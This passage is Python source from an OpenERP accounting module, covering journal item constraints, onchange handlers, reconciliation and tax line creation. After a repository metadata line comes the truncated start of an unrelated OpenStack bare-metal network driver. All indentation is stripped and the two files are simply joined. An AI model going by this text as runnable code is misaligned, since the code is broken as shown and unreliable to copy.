if (l.amount_currency > 0.0 and l.credit > 0.0) or (l.amount_currency < 0.0 and l.debit > 0.0):
return False
return True
def _check_currency_company(self, cr, uid, ids, context=None):
for l in self.browse(cr, uid, ids, context=context):
if l.currency_id.id == l.company_id.currency_id.id:
return False
return True
_constraints = [
(_check_no_view, 'You cannot create journal items on an account of type view or consolidation.', ['account_id']),
(_check_no_closed, 'You cannot create journal items on closed account.', ['account_id']),
(_check_company_id, 'Account and Period must belong to the same company.', ['company_id']),
(_check_date, 'The date of your Journal Entry is not in the defined period! You should change the date or remove this constraint from the journal.', ['date']),
(_check_currency, 'The selected account of your Journal Entry forces to provide a secondary currency. You should remove the secondary currency on the account or select a multi-currency view on the journal.', ['currency_id']),
(_check_currency_and_amount, "You cannot create journal items with a secondary currency without recording both 'currency' and 'amount currency' field.", ['currency_id','amount_currency']),
(_check_currency_amount, 'The amount expressed in the secondary currency must be positive when account is debited and negative when account is credited.', ['amount_currency']),
(_check_currency_company, "You cannot provide a secondary currency if it is the same than the company one." , ['currency_id']),
]
#TODO: ONCHANGE_ACCOUNT_ID: set account_tax_id
def onchange_currency(self, cr, uid, ids, account_id, amount, currency_id, date=False, journal=False, context=None):
if context is None:
context = {}
account_obj = self.pool.get('account.account')
journal_obj = self.pool.get('account.journal')
currency_obj = self.pool.get('res.currency')
if (not currency_id) or (not account_id):
return {}
result = {}
acc = account_obj.browse(cr, uid, account_id, context=context)
if (amount>0) and journal:
x = journal_obj.browse(cr, uid, journal).default_credit_account_id
if x: acc = x
context = dict(context)
context.update({
'date': date,
'res.currency.compute.account': acc,
})
v = currency_obj.compute(cr, uid, currency_id, acc.company_id.currency_id.id, amount, context=context)
result['value'] = {
'debit': v > 0 and v or 0.0,
'credit': v < 0 and -v or 0.0
}
return result
def onchange_partner_id(self, cr, uid, ids, move_id, partner_id, account_id=None, debit=0, credit=0, date=False, journal=False, context=None):
partner_obj = self.pool.get('res.partner')
payment_term_obj = self.pool.get('account.payment.term')
journal_obj = self.pool.get('account.journal')
fiscal_pos_obj = self.pool.get('account.fiscal.position')
val = {}
val['date_maturity'] = False
if not partner_id:
return {'value':val}
if not date:
date = datetime.now().strftime('%Y-%m-%d')
jt = False
if journal:
jt = journal_obj.browse(cr, uid, journal, context=context).type
part = partner_obj.browse(cr, uid, partner_id, context=context)
payment_term_id = False
if jt and jt in ('purchase', 'purchase_refund') and part.property_supplier_payment_term:
payment_term_id = part.property_supplier_payment_term.id
elif jt and part.property_payment_term:
payment_term_id = part.property_payment_term.id
if payment_term_id:
res = payment_term_obj.compute(cr, uid, payment_term_id, 100, date)
if res:
val['date_maturity'] = res[0][0]
if not account_id:
id1 = part.property_account_payable.id
id2 = part.property_account_receivable.id
if jt:
if jt in ('sale', 'purchase_refund'):
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2)
elif jt in ('purchase', 'sale_refund'):
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1)
elif jt in ('general', 'bank', 'cash'):
if part.customer:
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2)
elif part.supplier:
val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1)
if val.get('account_id', False):
d = self.onchange_account_id(cr, uid, ids, account_id=val['account_id'], partner_id=part.id, context=context)
val.update(d['value'])
return {'value':val}
def onchange_account_id(self, cr, uid, ids, account_id=False, partner_id=False, context=None):
account_obj = self.pool.get('account.account')
partner_obj = self.pool.get('res.partner')
fiscal_pos_obj = self.pool.get('account.fiscal.position')
val = {}
if account_id:
res = account_obj.browse(cr, uid, account_id, context=context)
tax_ids = res.tax_ids
if tax_ids and partner_id:
part = partner_obj.browse(cr, uid, partner_id, context=context)
tax_id = fiscal_pos_obj.map_tax(cr, uid, part and part.property_account_position or False, tax_ids)[0]
else:
tax_id = tax_ids and tax_ids[0].id or False
val['account_tax_id'] = tax_id
return {'value': val}
#
# type: the type if reconciliation (no logic behind this field, for info)
#
# writeoff; entry generated for the difference between the lines
#
def search(self, cr, uid, args, offset=0, limit=None, order=None, context=None, count=False):
if context is None:
context = {}
if context.get('fiscalyear'):
args.append(('period_id.fiscalyear_id', '=', context.get('fiscalyear', False)))
if context and context.get('next_partner_only', False):
if not context.get('partner_id', False):
partner = self.list_partners_to_reconcile(cr, uid, context=context)
if partner:
partner = partner[0]
else:
partner = context.get('partner_id', False)
if not partner:
return []
args.append(('partner_id', '=', partner[0]))
return super(account_move_line, self).search(cr, uid, args, offset, limit, order, context, count)
def prepare_move_lines_for_reconciliation_widget(self, cr, uid, lines, target_currency=False, target_date=False, context=None):
""" Returns move lines formatted for the manual/bank reconciliation widget
:param target_currency: curreny you want the move line debit/credit converted into
:param target_date: date to use for the monetary conversion
"""
if not lines:
return []
if context is None:
context = {}
ctx = context.copy()
currency_obj = self.pool.get('res.currency')
company_currency = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id
rml_parser = report_sxw.rml_parse(cr, uid, 'reconciliation_widget_aml', context=context)
ret = []
for line in lines:
partial_reconciliation_siblings_ids = []
if line.reconcile_partial_id:
partial_reconciliation_siblings_ids = self.search(cr, uid, [('reconcile_partial_id', '=', line.reconcile_partial_id.id)], context=context)
partial_reconciliation_siblings_ids.remove(line.id)
ret_line = {
'id': line.id,
'name': line.name != '/' and line.move_id.name + ': ' + line.name or line.move_id.name,
'ref': line.move_id.ref,
'account_code': line.account_id.code,
'account_name': line.account_id.name,
'account_type': line.account_id.type,
'date_maturity': line.date_maturity,
'date': line.date,
'period_name': line.period_id.name,
'journal_name': line.journal_id.name,
'partner_id': line.partner_id.id,
'partner_name': line.partner_id.name,
'is_partially_reconciled': bool(line.reconcile_partial_id),
'partial_reconciliation_siblings_ids': partial_reconciliation_siblings_ids,
}
# Amount residual can be negative
debit = line.debit
credit = line.credit
total_amount = abs(debit - credit)
total_amount_currency = line.amount_currency
amount_residual = line.amount_residual
amount_residual_currency = line.amount_residual_currency
if line.amount_residual < 0:
debit, credit = credit, debit
amount_residual = -amount_residual
amount_residual_currency = -amount_residual_currency
# Get right debit / credit:
line_currency = line.currency_id or company_currency
amount_currency_str = ""
total_amount_currency_str = ""
if line.currency_id and line.amount_currency:
amount_currency_str = rml_parser.formatLang(amount_residual_currency, currency_obj=line.currency_id)
total_amount_currency_str = rml_parser.formatLang(total_amount_currency, currency_obj=line.currency_id)
if target_currency and line_currency == target_currency and target_currency != company_currency:
debit = debit > 0 and amount_residual_currency or 0.0
credit = credit > 0 and amount_residual_currency or 0.0
amount_currency_str = rml_parser.formatLang(amount_residual, currency_obj=company_currency)
total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=company_currency)
amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency)
total_amount_str = rml_parser.formatLang(total_amount_currency, currency_obj=target_currency)
else:
debit = debit > 0 and amount_residual or 0.0
credit = credit > 0 and amount_residual or 0.0
amount_str = rml_parser.formatLang(debit or credit, currency_obj=company_currency)
total_amount_str = rml_parser.formatLang(total_amount, currency_obj=company_currency)
if target_currency and target_currency != company_currency:
amount_currency_str = rml_parser.formatLang(debit or credit, currency_obj=line_currency)
total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=line_currency)
ctx = context.copy()
if target_date:
ctx.update({'date': target_date})
debit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, debit, context=ctx)
credit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, credit, context=ctx)
amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency)
total_amount = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, total_amount, context=ctx)
total_amount_str = rml_parser.formatLang(total_amount, currency_obj=target_currency)
ret_line['credit'] = credit
ret_line['debit'] = debit
ret_line['amount_str'] = amount_str
ret_line['amount_currency_str'] = amount_currency_str
ret_line['total_amount_str'] = total_amount_str # For partial reconciliations
ret_line['total_amount_currency_str'] = total_amount_currency_str
ret.append(ret_line)
return ret
def list_partners_to_reconcile(self, cr, uid, context=None):
cr.execute(
"""SELECT partner_id FROM (
SELECT l.partner_id, p.last_reconciliation_date, SUM(l.debit) AS debit, SUM(l.credit) AS credit, MAX(l.create_date) AS max_date
FROM account_move_line l
RIGHT JOIN account_account a ON (a.id = l.account_id)
RIGHT JOIN res_partner p ON (l.partner_id = p.id)
WHERE a.reconcile IS TRUE
AND l.reconcile_id IS NULL
AND l.state <> 'draft'
GROUP BY l.partner_id, p.last_reconciliation_date
) AS s
WHERE debit > 0 AND credit > 0 AND (last_reconciliation_date IS NULL OR max_date > last_reconciliation_date)
ORDER BY last_reconciliation_date""")
ids = [x[0] for x in cr.fetchall()]
if not ids:
return []
# To apply the ir_rules
partner_obj = self.pool.get('res.partner')
ids = partner_obj.search(cr, uid, [('id', 'in', ids)], context=context)
return partner_obj.name_get(cr, uid, ids, context=context)
def reconcile_partial(self, cr, uid, ids, type='auto', context=None, writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False):
move_rec_obj = self.pool.get('account.move.reconcile')
merges = []
unmerge = []
total = 0.0
merges_rec = []
company_list = []
if context is None:
context = {}
for line in self.browse(cr, uid, ids, context=context):
if company_list and not line.company_id.id in company_list:
raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.'))
company_list.append(line.company_id.id)
for line in self.browse(cr, uid, ids, context=context):
if line.account_id.currency_id:
currency_id = line.account_id.currency_id
else:
currency_id = line.company_id.currency_id
if line.reconcile_id:
raise osv.except_osv(_('Warning'), _("Journal Item '%s' (id: %s), Move '%s' is already reconciled!") % (line.name, line.id, line.move_id.name))
if line.reconcile_partial_id:
for line2 in line.reconcile_partial_id.line_partial_ids:
if line2.state != 'valid':
raise osv.except_osv(_('Warning'), _("Journal Item '%s' (id: %s) cannot be used in a reconciliation as it is not balanced!") % (line2.name, line2.id))
if not line2.reconcile_id:
if line2.id not in merges:
merges.append(line2.id)
if line2.account_id.currency_id:
total += line2.amount_currency
else:
total += (line2.debit or 0.0) - (line2.credit or 0.0)
merges_rec.append(line.reconcile_partial_id.id)
else:
unmerge.append(line.id)
if line.account_id.currency_id:
total += line.amount_currency
else:
total += (line.debit or 0.0) - (line.credit or 0.0)
if self.pool.get('res.currency').is_zero(cr, uid, currency_id, total):
res = self.reconcile(cr, uid, merges+unmerge, context=context, writeoff_acc_id=writeoff_acc_id, writeoff_period_id=writeoff_period_id, writeoff_journal_id=writeoff_journal_id)
return res
# marking the lines as reconciled does not change their validity, so there is no need
# to revalidate their moves completely.
reconcile_context = dict(context, novalidate=True)
r_id = move_rec_obj.create(cr, uid, {
'type': type,
'line_partial_ids': map(lambda x: (4,x,False), merges+unmerge)
}, context=reconcile_context)
move_rec_obj.reconcile_partial_check(cr, uid, [r_id] + merges_rec, context=reconcile_context)
return r_id
def reconcile(self, cr, uid, ids, type='auto', writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False, context=None):
account_obj = self.pool.get('account.account')
move_obj = self.pool.get('account.move')
move_rec_obj = self.pool.get('account.move.reconcile')
partner_obj = self.pool.get('res.partner')
currency_obj = self.pool.get('res.currency')
lines = self.browse(cr, uid, ids, context=context)
unrec_lines = filter(lambda x: not x['reconcile_id'], lines)
credit = debit = 0.0
currency = 0.0
account_id = False
partner_id = False
if context is None:
context = {}
company_list = []
for line in self.browse(cr, uid, ids, context=context):
if company_list and not line.company_id.id in company_list:
raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.'))
company_list.append(line.company_id.id)
for line in unrec_lines:
if line.state <> 'valid':
raise osv.except_osv(_('Error!'),
_('Entry "%s" is not valid !') % line.name)
credit += line['credit']
debit += line['debit']
currency += line['amount_currency'] or 0.0
account_id = line['account_id']['id']
partner_id = (line['partner_id'] and line['partner_id']['id']) or False
writeoff = debit - credit
# Ifdate_p in context => take this date
if context.has_key('date_p') and context['date_p']:
date=context['date_p']
else:
date = time.strftime('%Y-%m-%d')
cr.execute('SELECT account_id, reconcile_id '\
'FROM account_move_line '\
'WHERE id IN %s '\
'GROUP BY account_id,reconcile_id',
(tuple(ids), ))
r = cr.fetchall()
#TODO: move this check to a constraint in the account_move_reconcile object
if len(r) != 1:
raise osv.except_osv(_('Error'), _('Entries are not of the same account or already reconciled ! '))
if not unrec_lines:
raise osv.except_osv(_('Error!'), _('Entry is already reconciled.'))
account = account_obj.browse(cr, uid, account_id, context=context)
if not account.reconcile:
raise osv.except_osv(_('Error'), _('The account is not defined to be reconciled !'))
if r[0][1] != None:
raise osv.except_osv(_('Error!'), _('Some entries are already reconciled.'))
if (not currency_obj.is_zero(cr, uid, account.company_id.currency_id, writeoff)) or \
(account.currency_id and (not currency_obj.is_zero(cr, uid, account.currency_id, currency))):
if not writeoff_acc_id:
raise osv.except_osv(_('Warning!'), _('You have to provide an account for the write off/exchange difference entry.'))
if writeoff > 0:
debit = writeoff
credit = 0.0
self_credit = writeoff
self_debit = 0.0
else:
debit = 0.0
credit = -writeoff
self_credit = 0.0
self_debit = -writeoff
# If comment exist in context, take it
if 'comment' in context and context['comment']:
libelle = context['comment']
else:
libelle = _('Write-Off')
cur_obj = self.pool.get('res.currency')
cur_id = False
amount_currency_writeoff = 0.0
if context.get('company_currency_id',False) != context.get('currency_id',False):
cur_id = context.get('currency_id',False)
for line in unrec_lines:
if line.currency_id and line.currency_id.id == context.get('currency_id',False):
amount_currency_writeoff += line.amount_currency
else:
tmp_amount = cur_obj.compute(cr, uid, line.account_id.company_id.currency_id.id, context.get('currency_id',False), abs(line.debit-line.credit), context={'date': line.date})
amount_currency_writeoff += (line.debit > 0) and tmp_amount or -tmp_amount
writeoff_lines = [
(0, 0, {
'name': libelle,
'debit': self_debit,
'credit': self_credit,
'account_id': account_id,
'date': date,
'partner_id': partner_id,
'currency_id': cur_id or (account.currency_id.id or False),
'amount_currency': amount_currency_writeoff and -1 * amount_currency_writeoff or (account.currency_id.id and -1 * currency or 0.0)
}),
(0, 0, {
'name': libelle,
'debit': debit,
'credit': credit,
'account_id': writeoff_acc_id,
'analytic_account_id': context.get('analytic_id', False),
'date': date,
'partner_id': partner_id,
'currency_id': cur_id or (account.currency_id.id or False),
'amount_currency': amount_currency_writeoff and amount_currency_writeoff or (account.currency_id.id and currency or 0.0)
})
]
writeoff_move_id = move_obj.create(cr, uid, {
'period_id': writeoff_period_id,
'journal_id': writeoff_journal_id,
'date':date,
'state': 'draft',
'line_id': writeoff_lines
})
writeoff_line_ids = self.search(cr, uid, [('move_id', '=', writeoff_move_id), ('account_id', '=', account_id)])
if account_id == writeoff_acc_id:
writeoff_line_ids = [writeoff_line_ids[1]]
ids += writeoff_line_ids
# marking the lines as reconciled does not change their validity, so there is no need
# to revalidate their moves completely.
reconcile_context = dict(context, novalidate=True)
r_id = move_rec_obj.create(cr, uid, {
'type': type,
'line_id': map(lambda x: (4, x, False), ids),
'line_partial_ids': map(lambda x: (3, x, False), ids)
}, context=reconcile_context)
# the id of the move.reconcile is written in the move.line (self) by the create method above
# because of the way the line_id are defined: (4, x, False)
for id in ids:
workflow.trg_trigger(uid, 'account.move.line', id, cr)
if lines and lines[0]:
partner_id = lines[0].partner_id and lines[0].partner_id.id or False
if partner_id and not partner_obj.has_something_to_reconcile(cr, uid, partner_id, context=context):
partner_obj.mark_as_reconciled(cr, uid, [partner_id], context=context)
return r_id
def view_header_get(self, cr, user, view_id, view_type, context=None):
if context is None:
context = {}
context = self.convert_to_period(cr, user, context=context)
if context.get('account_id', False):
cr.execute('SELECT code FROM account_account WHERE id = %s', (context['account_id'], ))
res = cr.fetchone()
if res:
res = _('Entries: ')+ (res[0] or '')
return res
if (not context.get('journal_id', False)) or (not context.get('period_id', False)):
return False
if context.get('search_default_journal_id', False):
context['journal_id'] = context.get('search_default_journal_id')
cr.execute('SELECT code FROM account_journal WHERE id = %s', (context['journal_id'], ))
j = cr.fetchone()[0] or ''
cr.execute('SELECT code FROM account_period WHERE id = %s', (context['period_id'], ))
p = cr.fetchone()[0] or ''
if j or p:
return j + (p and (':' + p) or '')
return False
def onchange_date(self, cr, user, ids, date, context=None):
"""
Returns a dict that contains new values and context
@param cr: A database cursor
@param user: ID of the user currently logged in
@param date: latest value from user input for field date
@param args: other arguments
@param context: context arguments, like lang, time zone
@return: Returns a dict which contains new values, and context
"""
res = {}
if context is None:
context = {}
period_pool = self.pool.get('account.period')
pids = period_pool.find(cr, user, date, context=context)
if pids:
res.update({'period_id':pids[0]})
context = dict(context, period_id=pids[0])
return {
'value':res,
'context':context,
}
def _check_moves(self, cr, uid, context=None):
# use the first move ever created for this journal and period
if context is None:
context = {}
cr.execute('SELECT id, state, name FROM account_move WHERE journal_id = %s AND period_id = %s ORDER BY id limit 1', (context['journal_id'],context['period_id']))
res = cr.fetchone()
if res:
if res[1] != 'draft':
raise osv.except_osv(_('User Error!'),
_('The account move (%s) for centralisation ' \
'has been confirmed.') % res[2])
return res
def _remove_move_reconcile(self, cr, uid, move_ids=None, opening_reconciliation=False, context=None):
# Function remove move rencocile ids related with moves
obj_move_line = self.pool.get('account.move.line')
obj_move_rec = self.pool.get('account.move.reconcile')
unlink_ids = []
if not move_ids:
return True
recs = obj_move_line.read(cr, uid, move_ids, ['reconcile_id', 'reconcile_partial_id'])
full_recs = filter(lambda x: x['reconcile_id'], recs)
rec_ids = [rec['reconcile_id'][0] for rec in full_recs]
part_recs = filter(lambda x: x['reconcile_partial_id'], recs)
part_rec_ids = [rec['reconcile_partial_id'][0] for rec in part_recs]
unlink_ids += rec_ids
unlink_ids += part_rec_ids
all_moves = obj_move_line.search(cr, uid, ['|',('reconcile_id', 'in', unlink_ids),('reconcile_partial_id', 'in', unlink_ids)])
all_moves = list(set(all_moves) - set(move_ids))
if unlink_ids:
if opening_reconciliation:
raise osv.except_osv(_('Warning!'),
_('Opening Entries have already been generated. Please run "Cancel Closing Entries" wizard to cancel those entries and then run this wizard.'))
obj_move_rec.write(cr, uid, unlink_ids, {'opening_reconciliation': False})
obj_move_rec.unlink(cr, uid, unlink_ids)
if len(all_moves) >= 2:
obj_move_line.reconcile_partial(cr, uid, all_moves, 'auto',context=context)
return True
def unlink(self, cr, uid, ids, context=None, check=True):
if context is None:
context = {}
move_obj = self.pool.get('account.move')
self._update_check(cr, uid, ids, context)
result = False
move_ids = set()
for line in self.browse(cr, uid, ids, context=context):
move_ids.add(line.move_id.id)
context['journal_id'] = line.journal_id.id
context['period_id'] = line.period_id.id
result = super(account_move_line, self).unlink(cr, uid, [line.id], context=context)
move_ids = list(move_ids)
if check and move_ids:
move_obj.validate(cr, uid, move_ids, context=context)
return result
def write(self, cr, uid, ids, vals, context=None, check=True, update_check=True):
if context is None:
context={}
move_obj = self.pool.get('account.move')
account_obj = self.pool.get('account.account')
journal_obj = self.pool.get('account.journal')
if isinstance(ids, (int, long)):
ids = [ids]
if vals.get('account_tax_id', False):
raise osv.except_osv(_('Unable to change tax!'), _('You cannot change the tax, you should remove and recreate lines.'))
if ('account_id' in vals) and not account_obj.read(cr, uid, vals['account_id'], ['active'])['active']:
raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.'))
if update_check:
if ('account_id' in vals) or ('journal_id' in vals) or ('period_id' in vals) or ('move_id' in vals) or ('debit' in vals) or ('credit' in vals) or ('date' in vals):
self._update_check(cr, uid, ids, context)
todo_date = None
if vals.get('date', False):
todo_date = vals['date']
del vals['date']
for line in self.browse(cr, uid, ids, context=context):
ctx = context.copy()
if not ctx.get('journal_id'):
if line.move_id:
ctx['journal_id'] = line.move_id.journal_id.id
else:
ctx['journal_id'] = line.journal_id.id
if not ctx.get('period_id'):
if line.move_id:
ctx['period_id'] = line.move_id.period_id.id
else:
ctx['period_id'] = line.period_id.id
#Check for centralisation
journal = journal_obj.browse(cr, uid, ctx['journal_id'], context=ctx)
if journal.centralisation:
self._check_moves(cr, uid, context=ctx)
result = super(account_move_line, self).write(cr, uid, ids, vals, context)
if check:
done = []
for line in self.browse(cr, uid, ids):
if line.move_id.id not in done:
done.append(line.move_id.id)
move_obj.validate(cr, uid, [line.move_id.id], context)
if todo_date:
move_obj.write(cr, uid, [line.move_id.id], {'date': todo_date}, context=context)
return result
def _update_journal_check(self, cr, uid, journal_id, period_id, context=None):
journal_obj = self.pool.get('account.journal')
period_obj = self.pool.get('account.period')
jour_period_obj = self.pool.get('account.journal.period')
cr.execute('SELECT state FROM account_journal_period WHERE journal_id = %s AND period_id = %s', (journal_id, period_id))
result = cr.fetchall()
journal = journal_obj.browse(cr, uid, journal_id, context=context)
period = period_obj.browse(cr, uid, period_id, context=context)
for (state,) in result:
if state == 'done':
raise osv.except_osv(_('Error!'), _('You can not add/modify entries in a closed period %s of journal %s.' % (period.name,journal.name)))
if not result:
jour_period_obj.create(cr, uid, {
'name': (journal.code or journal.name)+':'+(period.name or ''),
'journal_id': journal.id,
'period_id': period.id
})
return True
def _update_check(self, cr, uid, ids, context=None):
done = {}
for line in self.browse(cr, uid, ids, context=context):
err_msg = _('Move name (id): %s (%s)') % (line.move_id.name, str(line.move_id.id))
if line.move_id.state <> 'draft' and (not line.journal_id.entry_posted):
raise osv.except_osv(_('Error!'), _('You cannot do this modification on a confirmed entry. You can just change some non legal fields or you must unconfirm the journal entry first.\n%s.') % err_msg)
if line.reconcile_id:
raise osv.except_osv(_('Error!'), _('You cannot do this modification on a reconciled entry. You can just change some non legal fields or you must unreconcile first.\n%s.') % err_msg)
t = (line.journal_id.id, line.period_id.id)
if t not in done:
self._update_journal_check(cr, uid, line.journal_id.id, line.period_id.id, context)
done[t] = True
return True
def create(self, cr, uid, vals, context=None, check=True):
account_obj = self.pool.get('account.account')
tax_obj = self.pool.get('account.tax')
move_obj = self.pool.get('account.move')
cur_obj = self.pool.get('res.currency')
journal_obj = self.pool.get('account.journal')
context = dict(context or {})
if vals.get('move_id', False):
move = self.pool.get('account.move').browse(cr, uid, vals['move_id'], context=context)
if move.company_id:
vals['company_id'] = move.company_id.id
if move.date and not vals.get('date'):
vals['date'] = move.date
if ('account_id' in vals) and not account_obj.read(cr, uid, [vals['account_id']], ['active'])[0]['active']:
raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.'))
if 'journal_id' in vals and vals['journal_id']:
context['journal_id'] = vals['journal_id']
if 'period_id' in vals and vals['period_id']:
context['period_id'] = vals['period_id']
if ('journal_id' not in context) and ('move_id' in vals) and vals['move_id']:
m = move_obj.browse(cr, uid, vals['move_id'])
context['journal_id'] = m.journal_id.id
context['period_id'] = m.period_id.id
#we need to treat the case where a value is given in the context for period_id as a string
if 'period_id' in context and not isinstance(context.get('period_id', ''), (int, long)):
period_candidate_ids = self.pool.get('account.period').name_search(cr, uid, name=context.get('period_id',''))
if len(period_candidate_ids) != 1:
raise osv.except_osv(_('Error!'), _('No period found or more than one period found for the given date.'))
context['period_id'] = period_candidate_ids[0][0]
if not context.get('journal_id', False) and context.get('search_default_journal_id', False):
context['journal_id'] = context.get('search_default_journal_id')
self._update_journal_check(cr, uid, context['journal_id'], context['period_id'], context)
move_id = vals.get('move_id', False)
journal = journal_obj.browse(cr, uid, context['journal_id'], context=context)
vals['journal_id'] = vals.get('journal_id') or context.get('journal_id')
vals['period_id'] = vals.get('period_id') or context.get('period_id')
vals['date'] = vals.get('date') or context.get('date')
if not move_id:
if journal.centralisation:
#Check for centralisation
res = self._check_moves(cr, uid, context)
if res:
vals['move_id'] = res[0]
if not vals.get('move_id', False):
if journal.sequence_id:
#name = self.pool.get('ir.sequence').next_by_id(cr, uid, journal.sequence_id.id)
v = {
'date': vals.get('date', time.strftime('%Y-%m-%d')),
'period_id': context['period_id'],
'journal_id': context['journal_id']
}
if vals.get('ref', ''):
v.update({'ref': vals['ref']})
move_id = move_obj.create(cr, uid, v, context)
vals['move_id'] = move_id
else:
raise osv.except_osv(_('No Piece Number!'), _('Cannot create an automatic sequence for this piece.\nPut a sequence in the journal definition for automatic numbering or create a sequence manually for this piece.'))
ok = not (journal.type_control_ids or journal.account_control_ids)
if ('account_id' in vals):
account = account_obj.browse(cr, uid, vals['account_id'], context=context)
if journal.type_control_ids:
type = account.user_type
for t in journal.type_control_ids:
if type.code == t.code:
ok = True
break
if journal.account_control_ids and not ok:
for a in journal.account_control_ids:
if a.id == vals['account_id']:
ok = True
break
# Automatically convert in the account's secondary currency if there is one and
# the provided values were not already multi-currency
if account.currency_id and 'amount_currency' not in vals and account.currency_id.id != account.company_id.currency_id.id:
vals['currency_id'] = account.currency_id.id
ctx = {}
if 'date' in vals:
ctx['date'] = vals['date']
vals['amount_currency'] = cur_obj.compute(cr, uid, account.company_id.currency_id.id,
account.currency_id.id, vals.get('debit', 0.0)-vals.get('credit', 0.0), context=ctx)
if not ok:
raise osv.except_osv(_('Bad Account!'), _('You cannot use this general account in this journal, check the tab \'Entry Controls\' on the related journal.'))
result = super(account_move_line, self).create(cr, uid, vals, context=context)
# CREATE Taxes
if vals.get('account_tax_id', False):
tax_id = tax_obj.browse(cr, uid, vals['account_tax_id'])
total = vals['debit'] - vals['credit']
base_code = 'base_code_id'
tax_code = 'tax_code_id'
account_id = 'account_collected_id'
base_sign = 'base_sign'
tax_sign = 'tax_sign'
if journal.type in ('purchase_refund', 'sale_refund') or (journal.type in ('cash', 'bank') and total < 0):
base_code = 'ref_base_code_id'
tax_code = 'ref_tax_code_id'
account_id = 'account_paid_id'
base_sign = 'ref_base_sign'
tax_sign = 'ref_tax_sign'
tmp_cnt = 0
for tax in tax_obj.compute_all(cr, uid, [tax_id], total, 1.00, force_excluded=False).get('taxes'):
#create the base movement
if tmp_cnt == 0:
if tax[base_code]:
tmp_cnt += 1
if tax_id.price_include:
total = tax['price_unit']
newvals = {
'tax_code_id': tax[base_code],
'tax_amount': tax[base_sign] * abs(total),
}
if tax_id.price_include:
if tax['price_unit'] < 0:
newvals['credit'] = abs(tax['price_unit'])
else:
newvals['debit'] = tax['price_unit']
self.write(cr, uid, [result], newvals, context=context)
else:
data = {
'move_id': vals['move_id'],
'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''),
'date': vals['date'],
'partner_id': vals.get('partner_id', False),
'ref': vals.get('ref', False),
'statement_id': vals.get('statement_id', False),
'account_tax_id': False,
'tax_code_id': tax[base_code],
'tax_amount': tax[base_sign] * abs(total),
'account_id': vals['account_id'],
'credit': 0.0,
'debit': 0.0,
}
if data['tax_code_id']:
self.create(cr, uid, data, context)
#create the Tax movement
data = {
'move_id': vals['move_id'],
'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''),
'date': vals['date'],
'partner_id': vals.get('partner_id',False),
'ref': vals.get('ref',False),
'statement_id': vals.get('statement_id', False),
'account_tax_id': False,
'tax_code_id': tax[tax_code],
'tax_amount': tax[tax_sign] * abs(tax['amount']),
'account_id': tax[account_id] or vals['account_id'],
'credit': tax['amount']<0 and -tax['amount'] or 0.0,
'debit': tax['amount']>0 and tax['amount'] or 0.0,
}
if data['tax_code_id']:
self.create(cr, uid, data, context)
del vals['account_tax_id']
if check and not context.get('novalidate') and (context.get('recompute', True) or journal.entry_posted):
tmp = move_obj.validate(cr, uid, [vals['move_id']], context)
if journal.entry_posted and tmp:
move_obj.button_validate(cr,uid, [vals['move_id']], context)
return result
def list_periods(self, cr, uid, context=None):
ids = self.pool.get('account.period').search(cr,uid,[])
return self.pool.get('account.period').name_get(cr, uid, ids, context=context)
def list_journals(self, cr, uid, context=None):
ng = dict(self.pool.get('account.journal').name_search(cr,uid,'',[]))
ids = ng.keys()
result = []
for journal in self.pool.get('account.journal').browse(cr, uid, ids, context=context):
result.append((journal.id,ng[journal.id],journal.type,
bool(journal.currency),bool(journal.analytic_journal_id)))
return result
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
fajoy/nova | nova/virt/baremetal/vif_driver.py | 2 | 3058 | # Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import context
from nova import exception
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova.virt.baremetal import db as bmdb
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class BareMetalVIFDriver(object):
def _after_plug(self, instance, network, mapping, pif):
pass
def _after_unplug(self, instance, network, mapping, pif):
pass
def plug(self, instance, vif):
LOG.debug(_("plug: instance_uuid=%(uuid)s vif=%(vif)s")
% {'uuid': instance['uuid'], 'vif': vif})
network, mapping = vif
vif_uuid = mapping['vif_uuid']
ctx = context.get_admin_context()
node = bmdb.bm_node_get_by_instance_uuid(ctx, instance['uuid'])
# TODO(deva): optimize this database query
# this is just searching for a free physical interface
pifs = bmdb.bm_interface_get_all_by_bm_node_id(ctx, node['id'])
for pif in pifs:
if not pif['vif_uuid']:
bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], vif_uuid)
LOG.debug(_("pif:%(id)s is plugged (vif_uuid=%(vif_uuid)s)")
% {'id': pif['id'], 'vif_uuid': vif_uuid})
self._after_plug(instance, network, mapping, pif)
return
# NOTE(deva): should this really be raising an exception
# when there are no physical interfaces left?
raise exception.NovaException(_(
"Baremetal node: %(id)s has no available physical interface"
" for virtual interface %(vif_uuid)s")
% {'id': node['id'], 'vif_uuid': vif_uuid})
def unplug(self, instance, vif):
